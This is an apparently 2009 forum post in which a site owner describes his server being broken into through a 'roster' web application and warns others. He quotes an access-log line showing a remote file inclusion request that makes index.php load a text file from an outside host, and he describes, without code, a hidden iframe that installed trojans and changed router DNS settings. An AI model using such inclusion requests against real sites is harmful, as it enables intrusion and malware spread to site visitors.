Hello guys.
The last month I've been atacked by someone accessing to my server by the roster.
I've been speaking with my server support and they sent me the log.
Here is the next: - - [08/Apr/2009:17:26:49 +0200] "GET
/roster/index.php?p=http://www.wizard.com.br/id.txt??? HTTP/1.1" 200 153
herederosdethrall.es "-" "Mozilla
/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10)
Gecko/20050717 Firefox/1.0.6" "-"
Someone could access to my files and change all the "index.*" adding a hidden iframe. This iframe install a trojan in your system opening pop-ups continuesly in every web site you visit.
Not only that, if not that the pop-ups install new trojans more dangerous than the first one. My updated antivirus (McAffee Virusscan didn't detect them).
In fact I got a trojan who accessed to my router and changed my DNS servers at the end.
You can imagind what will happend if it happends in a house where they don't know about computers.
Be carefull with that and just find a solution for stop this ilegal access.